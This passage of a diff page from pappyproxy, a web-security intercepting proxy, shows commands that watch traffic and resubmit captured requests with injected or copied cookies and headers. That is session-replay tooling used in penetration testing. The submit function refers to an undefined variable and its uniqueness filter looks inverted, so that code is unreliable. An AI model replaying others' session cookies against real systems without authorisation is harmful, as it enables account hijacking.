macro.intercept_ws = True
with client.new_conn() as conn:
conn.intercept(macro)
print("Watching requests. Press <Enter> to quit...")
input()
def submit(client, cargs):
"""
Resubmit some requests, optionally with modified headers and cookies.
Usage: submit <reqid(s)> [-h] [-m] [-u] [-p] [-o REQID] [-c [COOKIES [COOKIES ...]]] [-d [HEADERS [HEADERS ...]]]
"""
#Usage: submit reqids [-h] [-m] [-u] [-p] [-o REQID] [-c [COOKIES [COOKIES ...]]] [-d [HEADERS [HEADERS ...]]]
if len(cargs) == 0:
raise CommandError("Missing request id(s)")
parser = argparse.ArgumentParser(prog="submit", usage=submit.__doc__)
#parser.add_argument('reqids')
parser.add_argument('-m', '--inmem', action='store_true', help='Store resubmitted requests in memory without storing them in the data file')
parser.add_argument('-u', '--unique', action='store_true', help='Only resubmit one request per endpoint (different URL parameters are different endpoints)')
parser.add_argument('-p', '--uniquepath', action='store_true', help='Only resubmit one request per endpoint (ignoring URL parameters)')
parser.add_argument('-c', '--cookies', nargs='*', help='Apply a cookie to requests before submitting')
parser.add_argument('-d', '--headers', nargs='*', help='Apply a header to requests before submitting')
parser.add_argument('-o', '--copycookies', help='Copy the cookies used in another request')
reqids = cargs[0]
args = parser.parse_args(cargs[1:])
headers = {}
cookies = {}
clear_cookies = False
if args.headers:
for h in args.headers:
k, v = h.split('=', 1)
headers[k] = v
if args.copycookies:
reqid = args.copycookies
req = client.req_by_id(reqid)
clear_cookies = True
for k, v in req.cookie_iter():
cookies[k] = v
if args.cookies:
for c in args.cookies:
k, v = c.split('=', 1)
cookies[k] = v
if args.unique and args.uniquepath:
raise CommandError('Both -u and -p cannot be given as arguments')
# Get requests to submit
#reqs = [r.copy() for r in client.in_context_requests()]
reqs = client.in_context_requests()
# Apply cookies and headers
for req in reqs:
if clear_cookies:
req.headers.delete("Cookie")
for k, v in cookies.items():
req.set_cookie(k, v)
for k, v in headers.items():
req.headers.set(k, v)
conf_message = "You're about to submit %d requests, continue?" % len(reqs)
if not confirm(conf_message):
return
# Filter unique paths
if args.uniquepath or args.unique:
endpoints = set()
new_reqs = []
for r in reqs:
if unique_path_and_args:
s = r.url.geturl()
else:
s = r.url.geturl(include_params=False)
if not s in endpoints:
new_reqs.append(r)
endpoints.add(s)
reqs = new_reqs
# Tag and send them
for req in reqs:
req.tags.add('resubmitted')
sys.stdout.write(client.get_reqid(req) + " ")
sys.stdout.flush()
storage = client.disk_storage.storage_id
if args.inmem:
storage = client.inmem_storage.storage_id
client.submit(req, storage=storage)
sys.stdout.write("\n")
sys.stdout.flush()
def run_with_less(client, args):
with Capturing() as output:
client.console.run_args(args)
with tempfile.NamedTemporaryFile() as tf:
tf.write(output.val.encode())
subprocess.call(['less', '-R', tf.name])
def load_cmds(cmd):
cmd.set_cmds({
'maddr': (message_address, None),
'ping': (ping, None),
'submit': (submit, None),
'watch': (watch, None),
'less': (run_with_less, None),
})

0
pappyproxy/plugins/__init__.py → pappyproxy/interface/repeater/__init__.py
Unescape View File

1607
pappyproxy/interface/repeater/repeater.py
View File

File diff suppressed because it is too large Load Diff

0
pappyproxy/plugins/vim_repeater/repeater.vim → pappyproxy/interface/repeater/repeater.vim
Unescape View File

Some files were not shown because too many files have changed in this diff Show More

Write Preview
Loading…
Cancel
Save